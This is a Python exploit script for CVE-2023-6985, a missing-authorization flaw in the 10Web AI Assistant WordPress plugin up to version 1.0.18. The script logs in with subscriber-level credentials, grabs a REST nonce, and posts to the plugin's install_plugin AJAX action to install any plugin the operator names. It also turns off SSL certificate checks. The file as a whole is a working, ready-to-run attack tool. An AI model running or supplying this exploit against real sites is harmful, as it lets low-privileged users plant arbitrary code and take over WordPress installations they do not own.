#!/usr/bin/env python3
import requests
import argparse
import os
import re


#
# Exploit script by @RandomRobbieBF
#

http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Ignore bad SSL
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def remove_html_tags(text):
    clean = re.compile('<.*?>')
    return re.sub(clean, '', text)

def login_and_activate_plugin(siteurl, wp_user, wp_pass,slug,pluginphp):


    # Log in
    session = requests.Session()
    session.verify = False  # Ignore SSL verification
    login_url = siteurl + '/wp-login.php'
    login_response = session.post(login_url, verify=False, data={
        'log': wp_user,
        'pwd': wp_pass,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    })
    cookies = login_response.cookies
    # Confirm successful login
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Logged in successfully.")
    else:
        print("Failed to log in.")
        exit()

    # Get REST API Nonce
    print('Getting REST API Nonce!')
    nonce_url = siteurl + '/wp-admin/admin-ajax.php?action=rest-nonce'
    nonce_response = session.get(nonce_url,cookies=cookies)
    rest_nonce = nonce_response.text.strip()
    
    print("Nonce Found: "+rest_nonce+"")
    
    # Install  Plugin
    print("Installing Plugin")
    paramsPost = {"action":"install_plugin","plugin_zip_name":slug,"ajax_nonce":rest_nonce,"plugin_file":""+slug+"/"+pluginphp+""}
    headers = {"Origin":siteurl,"Accept":"text/plain, */*; q=0.01","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0","Referer":""+siteurl+"/wp-admin/admin.php?page=ai_assistant_tenweb","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
    response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers, cookies=cookies)
    x = remove_html_tags(response.text).replace("&#8230;","")
    print(x)



# Add the vulnerability description as a comment
DESCRIPTION = """
10Web AI Assistant – AI content writing assistant <= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Description
CVE-2023-6985 - The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site."""


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    parser.add_argument('--url', required=True, help='URL of the WordPress site')
    parser.add_argument('--username', required=True, help='WordPress username')
    parser.add_argument('--password', required=True, help='WordPress password')
    parser.add_argument('--slug', required=True, help='WordPress Plugin Slug')
    parser.add_argument('--php', required=True, help='WordPress Plugin PHP file')
    args = parser.parse_args()

    login_and_activate_plugin(args.url, args.username, args.password,args.slug,args.php)